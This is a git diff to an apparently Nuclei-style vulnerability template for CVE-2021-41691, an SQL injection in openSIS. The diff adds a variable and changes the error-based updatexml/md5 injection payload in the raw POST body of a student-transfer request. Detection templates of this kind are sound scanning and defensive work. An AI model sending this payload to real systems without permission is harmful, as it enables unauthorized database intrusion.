diff --git a/cves/2021/CVE-2021-41691.yaml b/cves/2021/CVE-2021-41691.yaml index e4c0c19078..76f247c4d7 100644 --- a/cves/2021/CVE-2021-41691.yaml +++ b/cves/2021/CVE-2021-41691.yaml @@ -13,6 +13,9 @@ info: cve-id: CVE-2021-41691 tags: cve,cve2021,opensis,sqli,auth +variables: + num: "999999999" + requests: - raw: - | @@ -29,7 +32,7 @@ requests: Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 + student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 attack: pitchfork payloads: